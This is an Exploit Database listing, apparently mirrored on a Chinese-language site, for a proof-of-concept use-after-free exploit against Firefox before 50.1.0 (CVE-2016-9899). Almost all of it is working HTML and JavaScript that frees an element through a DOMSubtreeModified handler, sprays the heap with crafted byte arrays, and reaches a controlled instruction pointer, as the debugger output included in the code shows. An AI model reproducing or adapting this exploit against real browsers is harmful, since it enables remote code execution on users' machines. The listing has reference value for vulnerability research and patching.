Mozilla Firefox < 50.1.0 - Use-After-Free

• Exploit Database
• 36 阅读

• 作者： Marcin Ressel
  日期： 2017-01-13
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/41042/

• <!DOCTYPE html>
  <html>
  <head>
  <!-- <meta http-equiv="refresh" content="1"/> -->
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta http-equiv="Expires" content="0" />
  <meta http-equiv="Cache-Control" content="no-store, no-cache, must-revalidate" />
  <meta http-equiv="Cache-Control" content="post-check=0, pre-check=0" />
  <meta http-equiv="Pragma" content="no-cache" />
  <style type="text/css">
   body{
  background-color:lime;
  font-color:red;
   };
  </style>
  <script type='text/javascript'></script> 
  <script type="text/javascript" language="JavaScript">
   
   /* 
  * Mozilla Firefox < 50.1.0 Use-After-Free POC
  * Author: Marcin Ressel
  * Date: 13.01.2017
  * Vendor Homepage: www.mozilla.org
  * Software Link: https://ftp.mozilla.org/pub/firefox/releases/50.0.2/
  * Version: < 50.1.0
  * Tested on: Windows 7 (x64) Firefox 32 && 64 bit
  * CVE: CVE-2016-9899
  *************************************************
  * (b1c.5e0): Access violation - code c0000005 (first chance)
  * First chance exceptions are reported before any exception handling.
  * This exception may be expected and handled.
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files (x86)\Mozilla Firefox\xul.dll - 
  * eax=0f804c00 ebx=00000000 ecx=003be0c8 edx=4543484f esi=003be0e4 edi=06c71580
  * eip=6d7cc44c esp=003be0b8 ebp=003be0cc iopl=0 nv up ei pl nz na pe nc
  * cs=0023ss=002bds=002bes=002bfs=0053gs=002b efl=00010206
  * xul!mozilla::net::LoadInfo::AddRef+0x3dd41:
  * 6d7cc44c ff12calldword ptr [edx]ds:002b:4543484f=????????
  * 0:000> dd eax
  * 0f804c004543484f 91919191 91919191 91919191
  * 0f804c1091919191 91919191 91919191 91919191
  * 0f804c2091919191 91919191 91919191 91919191
  * 0f804c3091919191 91919191 91919191 91919191
  * 0f804c4091919191 91919191 91919191 91919191
  * 0f804c5091919191 91919191 91919191 91919191
  * 0f804c6091919191 91919191 91919191 91919191
  * 0f804c7091919191 91919191 91919191 91919191
  *
  */ 
   var doc = null;
   var cnt = 0;
  
   function m(blocks,size) {
  var arr = [];
  for(var i=0;i<blocks;i++) {
  arr[i] = new Array(size);
  for(var j=0;j<size;j+=2) {
  arr[i][j] = 0x41414141;
  arr[i][j+1] = 0x42424242;
  }
  }
  return arr;
  } 
  
  function handler() {//free
   if(cnt > 0) return;
   doc.body.appendChild(document.createElement("audio")).remove();
   m(1024,1024); 
   ++cnt;
  }
  
  function trigger() {
   if(cnt> 0) {
  var pl = new Array();
  doc.getElementsByTagName("*")[0].removeEventListener("DOMSubtreeModified",handler,false); 
  for(var i=0;i<4096;i++) { //replace
  pl[i]=new Uint8Array(1000);
  pl[i][0] = 0x4F;
  pl[i][1] = 0x48;
  pl[i][2] = 0x43;
  pl[i][3] = 0x45; //eip
  for(var j=4;j<(1000) - 4;j++) pl[i][j] = 0x91; 
   // pl[i] = document.createElement('media');
  //document.body.appendChild(pl[i]);
  }
  window.pl = pl
  document.getElementById("t1").remove(); //re-use
   }
  }
  
  function testcase()
  {
   var df = m(4096,1000);
   document.body.setAttribute('df',df);
  	 doc = document.getElementById("t1").contentWindow.document;
  	 doc.getElementsByTagName("*")[0].addEventListener("DOMSubtreeModified",handler,false); 
  	 doc.getElementsByTagName("*")[0].style = "ANNNY";
  	 setInterval("trigger();",1000); 
  
  }
  </script>
  <title>Firefox < 50.1.0 Use After Free (CVE-2016-9899) </title>
  </head>
  <body onload='testcase();'>
   <iframe src='about:blank' id='t1' width="100%"></iframe>
  </body>
  </html>